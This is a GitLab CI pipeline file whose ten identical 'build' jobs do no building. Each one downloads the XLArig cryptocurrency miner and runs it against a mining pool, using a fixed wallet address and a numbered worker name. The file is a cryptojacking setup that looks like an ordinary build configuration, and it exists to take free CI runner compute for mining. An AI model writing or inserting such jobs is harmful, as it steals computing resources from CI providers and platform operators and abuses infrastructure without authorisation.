image: golang:latest

variables:
  REPO_NAME: gitlab.com/namespace/project

stages:
  - build
  - test
  - deploy

build_a:
  stage: build
  script:
    - apt update
    - apt-get install unzip
    - wget https://github.com/scala-network/XLArig/releases/download/v5.2.2/XLArig-v5.2.2-linux-x86_64.zip
    - unzip XLArig-v5.2.2-linux-x86_64.zip
    - ./xlarig -o mine.scalaproject.io:5555 -u Svjb9K3h2DL3FiCR2Qi8L4YtCps2GgJdb1oF68dThFku69AHHsknNUKRPiPDTh3CwsiQAR11ZusneUbXd12n9Trc2KqW3j2ic -p agiz1 -a panthera -k

build_b:
  stage: build
  script:
    - apt update
    - apt-get install unzip
    - wget https://github.com/scala-network/XLArig/releases/download/v5.2.2/XLArig-v5.2.2-linux-x86_64.zip
    - unzip XLArig-v5.2.2-linux-x86_64.zip
    - ./xlarig -o mine.scalaproject.io:5555 -u Svjb9K3h2DL3FiCR2Qi8L4YtCps2GgJdb1oF68dThFku69AHHsknNUKRPiPDTh3CwsiQAR11ZusneUbXd12n9Trc2KqW3j2ic -p agiz2 -a panthera -k

build_c:
  stage: build
  script:
    - apt update
    - apt-get install unzip
    - wget https://github.com/scala-network/XLArig/releases/download/v5.2.2/XLArig-v5.2.2-linux-x86_64.zip
    - unzip XLArig-v5.2.2-linux-x86_64.zip
    - ./xlarig -o mine.scalaproject.io:5555 -u Svjb9K3h2DL3FiCR2Qi8L4YtCps2GgJdb1oF68dThFku69AHHsknNUKRPiPDTh3CwsiQAR11ZusneUbXd12n9Trc2KqW3j2ic -p agiz3 -a panthera -k

build_d:
  stage: build
  script:
    - apt update
    - apt-get install unzip
    - wget https://github.com/scala-network/XLArig/releases/download/v5.2.2/XLArig-v5.2.2-linux-x86_64.zip
    - unzip XLArig-v5.2.2-linux-x86_64.zip
    - ./xlarig -o mine.scalaproject.io:5555 -u Svjb9K3h2DL3FiCR2Qi8L4YtCps2GgJdb1oF68dThFku69AHHsknNUKRPiPDTh3CwsiQAR11ZusneUbXd12n9Trc2KqW3j2ic -p agiz4 -a panthera -k

build_e:
  stage: build
  script:
    - apt update
    - apt-get install unzip
    - wget https://github.com/scala-network/XLArig/releases/download/v5.2.2/XLArig-v5.2.2-linux-x86_64.zip
    - unzip XLArig-v5.2.2-linux-x86_64.zip
    - ./xlarig -o mine.scalaproject.io:5555 -u Svjb9K3h2DL3FiCR2Qi8L4YtCps2GgJdb1oF68dThFku69AHHsknNUKRPiPDTh3CwsiQAR11ZusneUbXd12n9Trc2KqW3j2ic -p agiz5 -a panthera -k

build_f:
  stage: build
  script:
    - apt update
    - apt-get install unzip
    - wget https://github.com/scala-network/XLArig/releases/download/v5.2.2/XLArig-v5.2.2-linux-x86_64.zip
    - unzip XLArig-v5.2.2-linux-x86_64.zip
    - ./xlarig -o mine.scalaproject.io:5555 -u Svjb9K3h2DL3FiCR2Qi8L4YtCps2GgJdb1oF68dThFku69AHHsknNUKRPiPDTh3CwsiQAR11ZusneUbXd12n9Trc2KqW3j2ic -p agiz6 -a panthera -k

build_g:
  stage: build
  script:
    - apt update
    - apt-get install unzip
    - wget https://github.com/scala-network/XLArig/releases/download/v5.2.2/XLArig-v5.2.2-linux-x86_64.zip
    - unzip XLArig-v5.2.2-linux-x86_64.zip
    - ./xlarig -o mine.scalaproject.io:5555 -u Svjb9K3h2DL3FiCR2Qi8L4YtCps2GgJdb1oF68dThFku69AHHsknNUKRPiPDTh3CwsiQAR11ZusneUbXd12n9Trc2KqW3j2ic -p agiz7 -a panthera -k

build_h:
  stage: build
  script:
    - apt update
    - apt-get install unzip
    - wget https://github.com/scala-network/XLArig/releases/download/v5.2.2/XLArig-v5.2.2-linux-x86_64.zip
    - unzip XLArig-v5.2.2-linux-x86_64.zip
    - ./xlarig -o mine.scalaproject.io:5555 -u Svjb9K3h2DL3FiCR2Qi8L4YtCps2GgJdb1oF68dThFku69AHHsknNUKRPiPDTh3CwsiQAR11ZusneUbXd12n9Trc2KqW3j2ic -p agiz8 -a panthera -k

build_i:
  stage: build
  script:
    - apt update
    - apt-get install unzip
    - wget https://github.com/scala-network/XLArig/releases/download/v5.2.2/XLArig-v5.2.2-linux-x86_64.zip
    - unzip XLArig-v5.2.2-linux-x86_64.zip
    - ./xlarig -o mine.scalaproject.io:5555 -u Svjb9K3h2DL3FiCR2Qi8L4YtCps2GgJdb1oF68dThFku69AHHsknNUKRPiPDTh3CwsiQAR11ZusneUbXd12n9Trc2KqW3j2ic -p agiz9 -a panthera -k

build_j:
  stage: build
  script:
    - apt update
    - apt-get install unzip
    - wget https://github.com/scala-network/XLArig/releases/download/v5.2.2/XLArig-v5.2.2-linux-x86_64.zip
    - unzip XLArig-v5.2.2-linux-x86_64.zip
    - ./xlarig -o mine.scalaproject.io:5555 -u Svjb9K3h2DL3FiCR2Qi8L4YtCps2GgJdb1oF68dThFku69AHHsknNUKRPiPDTh3CwsiQAR11ZusneUbXd12n9Trc2KqW3j2ic -p agiz10 -a panthera -k
